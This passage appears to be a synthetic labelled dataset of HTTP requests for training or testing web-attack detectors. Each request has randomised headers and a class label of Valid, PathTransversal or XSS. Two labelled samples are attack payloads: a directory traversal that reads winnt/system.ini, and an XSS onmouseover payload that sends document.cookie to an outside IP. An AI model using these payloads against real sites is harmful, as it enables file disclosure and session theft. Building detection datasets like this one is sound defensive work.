Last-Modified: Thu, 17 Sep 09 21:00:29 UTC
Host: www.hEeee.fr
Connection: wemsuxnn
Accept: audio/x-wav;q=0.4, text/*, application/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 179.76.248.108
Cookie: l2rsDniE=eN7om3dtI;UrmsehHIHd=unhqfrom-ieT;hno1m=rDnhrldejn\Aqcet8ih>
Cookie2: $Version="56"
Date: Thu, 29 Nov 07 07:08:03 UTC
ETag: "Pm@KNj@M3iTmLFkuR"
Expect: s08o8ni
From: tnetvp@eecp.ch
If-Modified-Since: Sun, 09 Oct 05 10:09:47 UTC
If-Unmodified-Since: Mon, 20 Aug 07 01:18:45 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 23 Nov 07 14:52:09 UTC
Max-Forwards: 4043
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest username="sceiDcRc"
Authorization: sihaEs pnOe=G7zoQ
Range: 28753-,6626-64231,21663-
Referer: http://www.fditbg.cz/Ya3ee/awv1a/Ncdn/hkzs.php3
TE: trailers,deflate;q=0.9,trailers
Trailer: Expect
User-Agent: hZbN6MG8e http://www.ifsf.cz
UA-CPU: x86
UA-Disp: 828,669,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3690x874
Via: HTTP/6.1 118.158.148.204, 0.6 www.teosrEo.shtml
Transfer-Encoding: identity
Upgrade: aee/8.0, iAec/1.3, eagyei/8.2, ecoYj/1.3, eawo7/8.8
Warning: 977 149.105.53.80 "sbonttde" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Cb4Cpasswdo=ka&rn5qgdsts=325&zGOmQKKzEboot.ini=nJvWJq2sc&emtodePxcono=9649&teae6Ir7eennss=8182&Ojpjrm=0014&atruetju=ivic1h4soo

End - Id: 7921
Start - Id: 20177
class: Valid
GET /nZsdBPCk/munoti/utts5hr.mdb?wee7itnSpa=iC6M%40NZ0K&HaHe6ataze=372&eseedo7nn=otto8s&oicdaOt9ah=886&iuesp=112041916&v@f2documentDcy2A=h3Oy03ka&dou1esnga=eR%25dbgsound&inetnd=%3Db&fnAFVwATopenKi=9496446 HTTP/1.1
Host: www.pSetvcn.be:80
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.8, x-mac-icelandic;q=0.6, x-mac-korean;q=0.6
Accept-Encoding: 
Accept-Language: oiheoi-6m, eimee-Ats, niljoul-ddsAeei
Cache-Control: max-age=611
Client-ip: 214.165.147.24
Cookie: Grtw2=0702559;ey4lnpaqtexsn=32384;3F=hskyM;andbgsound4bZb=Nalpkernteoteuil
Cookie2: $Version="682"
Date: Sun, 13 Jan 08 10:56:39 CET
ETag: W/"yG3JG3scvyp8FAK4oj0"
Expect: n5mbdad
From: eosoO@enstol2ni.de
If-Modified-Since: Tue, 28 Jun 05 01:04:56 UTC
If-Unmodified-Since: Tue, 23 Nov 04 01:07:32 GMT
If-Match: "wf1rGbtsRxubkHA4WD."
If-None-Match: "_k.@0osY@IAoIrVn"
If-Range: "G7s3D8YOzjLf4OF2S4"
Max-Forwards: 16
MIME-Version: 1.5
Pragma: eo=I
Proxy-Authorization: drij yiNes=2wtgpw
Authorization: NTLM dDVNb2NiYWxpZWxjbWhidUVlSGdlYW1lNnJlbGVibHJla2l0ZGVwblhs
Range: 365749-,607-065
Referer: http://fnmHtq.net/HOAeihj.jpeg
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 1.3; U6-ti; rv:7.6.5) Gecko/09245604
UA-CPU: StrongARM
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 199x535
Via: 2.3 www.2nEkls.shtml, 9.4 www.wgrh.jpg
Transfer-Encoding: identity
Upgrade: oieit/1.6, oam/2.4, hter/6.0, edl/2.6, anna/8.1
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20177
Start - Id: 45102
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: 187.200.168.234:80
Connection: close
Accept: text/*, application/rtf;q=0.9, image/*;q=0.4
Accept-Charset: big5, utf-8;q=0.0, big5
Accept-Encoding: 
Accept-Language: sgpfoWeo-cne4bm;q=0.9, tteoroo-e;q=0.0, cyls-oteo, uncLnes-az1;q=0.2
Cache-Control: min-fresh=2
Client-ip: 229.13.49.114
Cookie: sedtph=3
Cookie2: $Version="1"
Date: Thu, 30 Jun 05 17:01:03 CET
ETag: "NeIswK_7a5EBHO2LNI"
Expect: cles=tnrrwes
From: hlsgr2q@lokeQ.ch
If-Modified-Since: Sun, 21 Mar 04 21:14:23 UTC
If-Unmodified-Since: Sat, 21 May 05 16:37:33 UTC
If-Match: "@qTsqfeb1mDFCco"
If-None-Match: *
If-Range: Wed, 16 Jun 04 07:09:52 GMT
Max-Forwards: 2
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM TmhTZWRhdGhvaW9vZWlvc1dzenRmc2hhZDB1ZG5zcmFYZGQyc3Juc25uOA==
Authorization: Basic aGZzNW86aTlkZw==
Range: -3,456-488022
Referer: /Eclam/dwaz19d/alnie7/erso/hc5shlt.jsp
TE: gzip;q=0.6,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.1 (Machintosh; U; PPC 2.1; Le-f2; rv:0.5.3) Gecko/97893207
UA-CPU: StrongARM
UA-Disp: 4629,539,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 213x015
Via: 2.0 91.186.196.32
Transfer-Encoding: gzip
Upgrade: ud4hrt/2.8, ifephn/3.0, adtIIr/9.5, oHsuT3/8.9
Warning: 131 165.136.34.196 "tchbajdsaa" "Fri, 12 Mar 10 18:52:44 CET"
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 888948293
----: ----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45102
Start - Id: 31919
class: Valid
GET /set/-Y/eGtpezi@5dBIaiI/P6EEmUY9VZ9T-c/e7/oe/a0rkaTpwHK/ttsuia0isEqscs/RhrQpenneiseDsxvgisL.asmx?BAwindow.openHuvACDt=%3Fifautoexeci%5C&yciesaS2wtoqesI=2293&chseabnnetasal=aaTcRnttryfse&yUnite8itlh=Ep&iaToettmn=sbetfobetween%2B%2F47ez&tsfpeowuo8e=3u5P&SuYexec0ND=69800&wo-eW82d=ecdjtamsese7E7&en5ioetzhAnedis=0a%3Dsh++uikcrcpAstsderxall&0rhtuEtvmCalH=oog&icrhoLhroozngs=6883&4Ieeahoo=3539&rh6iOt=ne13eoSbtubi&ennO6=%3EunionPl1ep HTTP/1.1
Host: 123.66.196.66
Connection: seits7
Accept: */*
Accept-Charset: iso-2022-jp, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=0232
Client-ip: 143.11.173.48
Cookie: uZM33=8e4;aaEn7R0QbrrWe=28ireuptr8m;vI56ADservicesDTi=9;esqecjosuansb9=iUS0ZLdMhwxw;VeS-V=5NSe1ndeWrnatu2m;neha=sa
Cookie2: $Version="7"
Date: Tue, 04 Sep 07 01:20:57 CET
ETag: "_HQ6K0UI4j0FH_P"
Expect: 100-continue
From: haeoa@filcnbidra.net
If-Modified-Since: Fri, 03 Aug 07 09:35:58 GMT
If-Unmodified-Since: Fri, 01 Oct 04 10:27:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 30 Oct 05 13:55:52 UTC
Max-Forwards: 7
MIME-Version: 0.4
Pragma: epb=hpzi2ehh
Proxy-Authorization: NTLM aFJuSHM5c2hpdGlvSGwwSGZ3dE5hbnBkd2l1b1VwaWR0dnM3YXVyd2FvYW1vdGVu
Authorization: NTLM cm1zYXNubGVodWJsdWNTZXk0b2Fsa2Vpc2JvaHR4YXZhdGsyanN3cg==
Range: -8,3314-2228
Referer: http://nruNcujt.cz/amneNs/kycTs5p.nsf
TE: gzip,trailers,trailers
Trailer: Expect
User-Agent: Mozilla/9.2 (Windows; U; WinNT 9.4; T9-rg; rv:1.2.4) Gecko/71659307
UA-CPU: 68000
UA-Disp: 280,3333,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 6.6 www.teBetDbr.png
Transfer-Encoding: taan; nimwemne=neparEeh
Upgrade: mrsd/4.1
Warning: 131 www.apir.html "lnAgieyr2dmtfnwy" 
X-Forwarded-For: 159.180.214.45
X-Serial-Number: 643504609
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31919
Start - Id: 2830
class: Valid
GET /o5mAVbW_-d/2sae/vEA9mq3/i9r8gks/e5tpogSlY/OhO3tMnkdutd/p21NzY-/haferacaiIg9ts/nncr5hr4c/hrcyZ.html?KNt-AXpMUp=5eE7%40Eg&UxE7eHKNd_KA=446&1R54uobjectDEg=sew&bbeaog5wi1t=%5Bdxreexeclntco&0guAnhrtwyus=inse&k6taudspsptahws=vhomeD&gr=eahmitardbsmiqe HTTP/1.0
Host: www.mflZ.gov
Connection: keep-alive
Accept: text/*, audio/*
Accept-Charset: x-mac-ce, x-mac-arabic;q=0.3, iso-2022-jp
Accept-Encoding: 
Accept-Language: olh-s4e;q=0.4
Cache-Control: feenaall=uir
Client-ip: 113.167.174.55
Cookie: 8tSey=AeGymnq2;6YNinsert=a3yKi6q.cX;eatCroaiteTny=848861
Cookie2: $Version="01"
Date: Sun, 04 Mar 07 12:14:15 UTC
ETag: "hcNaxx7E@Au@DR0w"
Expect: oeiuyeaf=fe0e2;e8rcdolt=pntyer
From: eu9oe@edkE.uk
If-Modified-Since: Fri, 14 Nov 08 04:55:43 GMT
If-Unmodified-Since: Sat, 29 Apr 06 22:54:25 UTC
If-Match: "sy1KA7P00nAkveRJS68"
If-None-Match: "gWlKTGW9ZfrbNZVBw"
If-Range: Thu, 03 Sep 09 05:04:15 CET
Max-Forwards: 9
MIME-Version: 8.2
Pragma: snnnhbmt='uxpnIo'
Proxy-Authorization: Basic bmFtYWg6NXMyYXY=
Authorization: ld5n hvtstre=c51Fzo
Range: -648
Referer: http://tht3.de/elhtdre/ealdiY/0uaS9e/uhgats.msf
TE: trailers,gzip;q=0.4
Trailer: Trailer
User-Agent: Mozilla/6.6 (compatible; Konqueror/6.4; Open BSD i386; robzchrrF; sbtCxapWt; lgitoti)
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: HTTP/6.3 79.185.164.243:157
Transfer-Encoding: compress
Upgrade: Sbhjos/1.1
Warning: 301 www.oimey.png "uaeoiaoalxt" 
X-Forwarded-For: 194.52.16.118
X-Serial-Number: 8694580923107
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2830
Start - Id: 33615
class: Valid
POST /aidaLsLoemroo5/SnLubqO/wfh8okc@gAw1eouU@Ji/9r0idzwgcjhi/hntEe14aeith/2ze/VexecqZEOopvbscript8N/ga/epbdh13/ct.jpeg? HTTP/1.1
Content-Length: 216
Content-Language: Vesa,oa4n3yst,ata
Content-Encoding: compress
Content-Location: http://www.arru.net/eegaiN/2ahaif.css
Content-MD5: bHVvMm9ldEVlYW1udHJJbw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 14:55:10 UTC
Last-Modified: Fri, 16 Jun 06 18:05:44 GMT
Host: www.lhi4.com
Connection: keep-alive
Accept: */*
Accept-Charset: utf-7, euc-tw, x-mac-chinesesimp;q=0.4
Accept-Encoding: identity;q=0.0, deflate;q=0.3, gzip
Accept-Language: n2y-bcRsphh, tE-ee;q=0.8, datsF-eli8x;q=0.3, o-l8lpet9t;q=0.7, ad-1yfac
Cache-Control: only-if-cached
Client-ip: 239.255.99.116
Cookie: Rhas2=e servicesn;30DinputtJboot.ini=r]Es?;omb2rmsRNo=eSxMviU9U;ashnhrn4femg=n+n;zPjh1connectCJYV=gesehl8orrmrIitu
Cookie2: $Version="43"
Date: Sun, 09 Mar 08 01:10:03 UTC
Expect: lT4ye=brlne6
If-Modified-Since: Tue, 14 Oct 08 14:27:40 GMT
If-Unmodified-Since: Thu, 22 Jan 09 09:49:28 UTC
If-Match: "4bN97Jcb1OQRzH-"
If-None-Match: *
If-Range: Tue, 14 Sep 04 17:02:31 UTC
Max-Forwards: 023
MIME-Version: 8.4
Pragma: no-cache
Authorization: eahlmn aderS=Ugn7mdh
Range: 409459-7,-297771
Referer: /hise/en7eaWe/dr4n/tde4u.exe
TE: deflate;q=0.3,trailers,trailers
User-Agent: t9Int26v (a7Xv25-t; o9P3YYOeNn)
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 4177x0354
Via: nir9/4.4 www.3eta.gif:0, adn/3.5 232.56.51.75
Transfer-Encoding: deflate
Warning: 832 www.ehihKame.gif "khIC0" 
X-Forwarded-For: 246.11.40.158

cadminT_0VGmochaa=5-GXwUoLi2il&seaiimDiPvdaiEi=lopt&Vg=cade34tc2dNah-t&oti=-suactt2a&eu=relebs&safitt=rscuroa1t36rc&e4=3489547&0z668B=eosmht sock_streamoa&SilW6y5=piaD&bqdngqrW=Atpof&RS9F.Uo_JF=3730328&enfja=92279337

End - Id: 33615
Start - Id: 16498
class: Valid
GET /asemalosrraeesoAssm/z_L21z4AN-UPOzw/eutEhTqsrkWN.kEMY/an-u@C75z.htm?yetDasth3sa=t0hmn0&to0zzLecmrba7r=26&ewnWDl5dueaHs4i=95074683&Llasnfe=enon&rugTnecey97=187991&tifnfjcc=%2B&hlmseeuuv=40460819 HTTP/1.1
Host: 147.18.75.154
Connection: keep-alive
Accept: image/*, image/png;q=0.8
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=4
Client-ip: 72.32.223.2
Cookie: eStqa2eselothse=a );p.betweenJu6w_=IoeTiOechoxaAnbodya5;ilofbcauua3r=381043;ndeRsdbPhsoe=oio
Cookie2: $Version="3"
Date: Mon, 13 Feb 06 20:11:27 CET
ETag: W/"i2L09a-ha44vCPnqkJ"
Expect: lnoe=7sh5
From: ceErcs@l2xistettd.st
If-Modified-Since: Wed, 16 Apr 08 23:31:07 UTC
If-Unmodified-Since: Mon, 15 Feb 10 14:51:38 CET
If-Match: *
If-None-Match: "Nli692NNfdkj2mU_"
If-Range: Sat, 03 Apr 04 10:04:55 GMT
Max-Forwards: 5
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM cmxwZ2E1eGdUTmdzNmVydGdib2VyczVyc3RhdG9pc2k=
Authorization: Basic d2xwVXJkeWk6dXdlZWVueG4=
Range: 90-3929,2123-,048886-
Referer: /ewrDh/tixeedr/2o0seyoe.jpg
TE: deflate,trailers
Trailer: Via
User-Agent: Mozilla/5.7 (compatible; Inom; Linux i386; ngOr; wehsdeine; wurnsI)
UA-CPU: StrongARM
UA-Disp: 456,224,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 2853x703
Via: 2.1 244.97.230.255:662, 7.4 www.1tte7.htm
Transfer-Encoding: yHroe; osguee=wotte
Upgrade: reixds/4.0, nislAs/5.2, psssS/6.8, dR3i/5.5
Warning: 399 165.168.5.56 "Yeip137iXelsbw" 
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 41800939485
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16498
Start - Id: 7620
class: Valid
POST /iXgjTDPejp4XN3MtfJS.png? HTTP/1.0
Content-Length: 181
Content-Language: ut7gndt,clib,EE
Content-Encoding: deflate
Content-Location: http://www.dsotkz.biz/acszthtl/aaNn.jpeg
Content-MD5: SEl0c1VpdFNjdGFIc3lydA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Mar 05 05:53:15 UTC
Last-Modified: Thu, 17 Mar 05 05:58:21 UTC
Host: www.Dcdf.de
Connection: remtsde
Accept: text/*;q=0.1
Accept-Charset: *;q=0.0
Accept-Encoding: compress, deflate, identity;q=0.6, deflate;q=0.2, compress;q=0.2
Accept-Language: *
Cache-Control: no-cache
Client-ip: 136.161.142.168
Cookie: rsribi71heusoi=meta\;skFntR8oscriptE3E=rAsTeaawQtlmneetae;Cowoptijs=378015;nSm5ae1ri=mizKcopyl
Cookie2: $Version="506"
Date: Thu, 29 Jun 06 16:51:26 CET
ETag: "qi2unb4DKTAP9F9lw"
Expect: 100-continue
From: tehi@7enoehbi5.it
If-Modified-Since: Mon, 28 May 07 12:49:50 CET
If-Unmodified-Since: Fri, 09 Apr 04 16:43:21 CET
If-Match: "huMO@icQXZzZYrOs"
If-None-Match: *
If-Range: Thu, 22 Apr 04 06:48:20 CET
Max-Forwards: 5
MIME-Version: 5.9
Pragma: lnqta=fen
Proxy-Authorization: Basic UzluZWhtbjp0dWxnbg==
Authorization: NTLM YUFmZGVvaGo4NmxYRWpwbGZsZHVHdXdldEl0c3JlcW9z
Range: 589350-528199,5255-4
Referer: /eirc/e1eoaO/a5rn/1u0u/eszaO6.doc
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 9.4; je-ee; rv:5.8.4) Gecko/75773978
UA-CPU: 68000
UA-OS: Windows NT
UA-Color: color32
Via: HTTP/1.8 www.aelnK.png:9, 0.9 224.212.157.113, FTP/3.4 34.4.193.138
Transfer-Encoding: gzip
Upgrade: yyr85/0.6, mnLmta/7.1, sedrw/1.7, wRp3/3.2, ebe/4.8
X-Forwarded-For: 223.150.236.173
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

23teou=LNbinnner<ooreimgt&dio4uiemsimIn=6leonbnSnd&yGv1y=tdr7mb2eWY&tdttOE=33211684&ma2m2sodntkszf=~n76h&ooit6ye4Bsoa5=t&Meg7e=se;Ees9l3t sohtpasses&hY@dO=eva&sahw7P=kZEyBaM9u

End - Id: 7620
Start - Id: 18272
class: Valid
GET /kTAT.ca1FoL8czRYXUh/wcodthlnwiestoe/h@0NkqRn3p0.cgi?WBwCHGqJxterm=Oees++mM&wleSe3as=eisi&sideovRfeBpnev=30286397&tgirn=868&mebtwiss1fnnth=nanUlsA&Ueyzne=tmtstdaeerdil1&kite=nph-edrop&Rhaeaeimeehit=3hKgH-ik9ZKk&ehTdedrjwsC1i7X=7nznUy4&4@7VQFinputmWj=nam+tIhfC+wgetJ9fw&nGtebAu=r+ HTTP/1.1
Host: 184.183.202.183
Connection: oilRwl
Accept: */*;q=0.4
Accept-Charset: iso-8859-4, windows-1257;q=0.1, x-mac-chinesesimp
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 222.68.186.9
Cookie: dcf=oTa
Cookie2: $Version="885"
Date: Sat, 27 May 06 10:24:06 CET
ETag: W/"gA5TPxjX67hHpLoXl@v"
Expect: 8ornd
From: tAienyay@xtgc.gov
If-Modified-Since: Wed, 25 Oct 06 20:32:11 GMT
If-Unmodified-Since: Wed, 01 Jun 05 17:13:01 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: NTLM SGV1b3NseDlycmVzaXE5aWFBUnRjNnpNM3VsbXFnMGRvaGVvbzdhY2VqZWZv
Range: -043,7-,317257-
Referer: /EN0aiur/kygiqrl/tla9s/oeOw/qxsmln.txt
TE: trailers,chunked;q=0.8,gzip
Trailer: Authorization
User-Agent: Onelnet/6.9
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: 6.0 www.rdean.htm, 4.2 240.75.255.62
Transfer-Encoding: identity
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 364 5.11.203.107 "otm7lanyas" 
X-Forwarded-For: 210.2.25.150
X-Serial-Number: 561642112
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18272
Start - Id: 15300
class: Valid
GET /gt7l7br4QFdg/jhyiNiteN9/e5W4pHHOMFiX/hTpKW_swdc/l8tbte3enCh7ethtnuo/e6EzYEeRGw6rvU_L/yni5sJezes.exe?hrf71JzG0V=HeoateiId6soeTD&1ino=eoeew&OtHnauo=bint%3F&3fwakyEP=Ndcmdaiframe&7lhni=7&iorom4ho=a05r6NabQ&1y=tnek3sf%3Flibre%26h&LG9.Fs_XS@4_=31622923&sS0wfaImm=cVg31teurendbu7&ti=mfz%40ihdseanolnr&x0i4t=eSoUS.&pboot.iniftp0Q=nce5%29rrU%3D&Knui=araem&zaui6e=tnmrpxnwt HTTP/1.0
Host: www.9oanta.de:87424
Connection: btr8e
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 92.112.2.184
Cookie: edd=284;waflraedjqg=ad;QEFAf3Toiframemh=2144702;odiiclwr6ghe3zi=64;BUJia2Or5Kwp-shutdown=71
Cookie2: $Version="3"
Date: Mon, 09 Jan 06 19:50:45 CET
ETag: "eyEDedkQLRzP76QO1Y"
Expect: 100-continue
From: sbR2u@rgtt.st
If-Modified-Since: Sun, 18 Mar 07 10:34:20 GMT
If-Unmodified-Since: Sun, 11 Nov 07 22:51:39 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Dec 05 07:03:02 CET
Max-Forwards: 972
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtaas7"
Authorization: Digest nonce
Range: -0,247-43132,14-73
Referer: http://www.o7hfi.it/Qletrg7h/izsa/67en/t9IR/Jnoc7.cfm
TE: trailers
Trailer: Upgrade
User-Agent: Mozilla/9.6 (X11; U; Unix 2.1; ez-a3; rv:0.6.9) Gecko/89424515
UA-CPU: 68000
UA-Disp: 331,6855,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9424x098
Via: 4.3 59.185.144.121, 7.6 www.eu70T5.tiff, meie/5.0 www.csolpco.jpg
Transfer-Encoding: compress
Upgrade: 3ru/9.4
Warning: 189 92.1.234.153:27594 "naHareadKpMhtp0htee" "Fri, 02 May 08 07:48:39 GMT"
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 4648652857
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15300
Start - Id: 47077
class: XSS
GET /tKyRJEyLu5K-jnx4_JK/na-x2Wfxzu/sP0M7TzTnWVK.nsf?rdrdrozanazcl=btae&ryeYbu=%3Cdiv++onmouseover+%3D++++%22%5Bwindow.open%28%27http%3A%2F%2F251.39.28.58%2Fnira.bin%27%2Bdocument.cookie%29%3B%5D++%22+++%3E&oa=lm%27xostdin9s&LmntsB=882065105&N7bdivFMaK=re%28&n5=jshls&xl=%7Eevalae%3Ceqo&senrj=R1in&xmsszey1ty=tcpassthruaT&a0=r&fdl=o&Tube=9aeWKVwhTGq HTTP/1.0
Host: 98.194.239.151
Connection: close
Accept: application/*, audio/x-wav;q=0.7, video/*
Accept-Charset: iso-8859-8, x-mac-turkish, windows-1254;q=0.4, gb2312;q=0.7
Accept-Encoding: deflate;q=0.9, compress, deflate;q=0.7, deflate, identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 25.88.59.6
Cookie: ec=62009654;Fs_96u5_6p=08connectqtt: servicesncHeeisoiformt;ahsed1cnnts=vgn0ezteeeahgois/betweenh;DLd2HK=ncneba;ivEmznJmi=629886
Cookie2: $Version="2"
Date: Thu, 24 Sep 09 09:31:20 GMT
ETag: W/"qivQOJMh@tYyao0_E"
Expect: yshaae=hl6e2eC
From: ea8Dl2@Editdvt.it
If-Modified-Since: Mon, 18 Sep 06 11:19:36 UTC
If-Unmodified-Since: Tue, 07 Sep 04 17:58:02 CET
If-Match: "Dri8@JuS0nmwkLViD"
If-None-Match: *
If-Range: "a-pNNOVA-Nh8d8DAo9A"
Max-Forwards: 111
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: sevi uteRs=ionsesm
Authorization: NTLM dGZHYWJ0cmVHNk52cm5lYXloemlhb3pxN2V0RXlrcnN1bGlvYTU=
Range: 44535-
Referer: http://www.yhloe.gov/meIts.mp3
TE: trailers
Trailer: Pragma
User-Agent: rmeMn (eR-Ja5X; shJjLx3P; avJDneIm; iN6ZK.)
UA-CPU: MIPS
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 987x1282
Via: ee3jn/1.2 13.19.213.79:8110
Transfer-Encoding: identity
Upgrade: dgs8Uh/8.4, anv/0.9
Warning: 930 www.rhrotp.css "oS5uoH2eunannrpi" 
X-Forwarded-For: 69.181.229.169
X-Serial-Number: 6641279926067
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47077
Start - Id: 28443
class: Valid
GET /hVmIV-O3jfPWb/7OOJTwp-RPx0MRgh/rwFzrakOsAvRtfqNc/tivfseIpa/trcg.m/iFvns1el/vwte2hzemuti/r9g_iX-sehH3cy1j.qen/uJJQDu9oK50fcjkDd-u/nnourkumii/6H_oprSPj4Ot.asp? HTTP/1.1
Host: www.ie3ei.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, gzip, deflate, deflate;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 23.125.235.155
Cookie: cechtaeo=7jan8;S8SS2kzm=?8D;tt=8
Cookie2: $Version="10"
Date: Thu, 10 Nov 05 13:08:49 UTC
ETag: "mccanSDjD7VajHTH-hd4"
Expect: ddcrtF
From: oBcae9t@txO3eond.biz
If-Modified-Since: Tue, 26 Jul 05 21:16:46 GMT
If-Unmodified-Since: Sat, 22 May 04 07:07:47 GMT
If-Match: *
If-None-Match: "ib5f_QNWmcxeSWcha8F2"
If-Range: "t2wGUidnIRzq@S9NUv"
Max-Forwards: 2610
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZW5lbVduZG50dDFoaHRyaUlpc293ZWh6Y240YW9UZXlsMnQ=
Range: 73994-97349,-960
Referer: /hcih0u/asenmcNI.swf
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (compatible; MSIE 1.2; Solaris; EylZndpt; aeatatdel; pidnR)
UA-CPU: Sparc
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 3420x5548
Via: 8.4 www.Syxmlb.shtml
Transfer-Encoding: gzip
Upgrade: 7t3eo/4.1, aetae/9.1, fEe/9.1, shiotn/1.3, jNe/2.0
Warning: 767 www.EeowrQT.jpg "t1heot" 
X-Forwarded-For: 34.125.43.206
X-Serial-Number: 032993654516042
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28443
Start - Id: 7890
class: Valid
PUT /laz9tRrjenpeage/svMthoZ7Js4pHw@/having-ddropGW8T/3positioncatexecnF/vgq3tIe28E/ukRjA3w_ZY/ct1y0D7/nAVBqWdGvbUk3/k9ITNkdbeLDx9UFfU/Rse9ritmohbseda.tiff? HTTP/1.0
Content-Length: 240
Content-Language: u
Content-Encoding: deflate
Content-Location: /0cicHgue/taeoal/orkwsee2/abaiwl.dll
Content-MD5: Nm5yZnRhZUhzZHRlYXJ5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 31 Oct 06 17:58:56 GMT
Last-Modified: Sun, 13 Jan 08 09:56:37 GMT
Host: www.eshna4ePrt.st
Connection: hgnrfsp
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: s='tmoj'
Client-ip: 242.184.161.176
Cookie: hhe9=fUenfnroceiie;reaTHen0esrijrq=42;pcD0Wp=eza$;KM@FVz2window.open=02745547;zSoieeHoSE=ttihayzpaTzdkmEery
Cookie2: $Version="00"
Date: Sat, 02 Oct 04 12:25:59 GMT
ETag: W/"p.32.oEBJ_zbiwPA"
Expect: 100-continue
From: n9wwoaa@rinasnir.com
If-Modified-Since: Sat, 10 Feb 07 10:32:01 CET
If-Unmodified-Since: Wed, 12 Nov 08 06:57:31 UTC
If-Match: "oV4EJvaaUmcrHoRCm"
If-None-Match: *
If-Range: Sun, 17 Jun 07 13:03:06 CET
Max-Forwards: 2032
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: Basic dElxZG9MaDplYnlTbG5ONQ==
Authorization: NTLM c2Nvc29oZWlVYmlvcWlCMWg5bUZocnV0cW9kb3VpZXRsaXJvcmhseXBlbWFBbnk=
Range: 8674-,-34,86935-
Referer: http://oOda.fr/wnaiea/err23it.zip
TE: trailers,gzip
Trailer: Cache-Control
User-Agent: Mozilla/4.9 (Machintosh; U; PPC Mac OS X 8.2; tr-ri; rv:2.0.8) Gecko/69633983
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 795x581
Via: 0.4 www.eetoi.jpg, 7.7 www.eo4ner.png:0
Transfer-Encoding: identity
Upgrade: usri/3.9
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 241.82.49.30
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

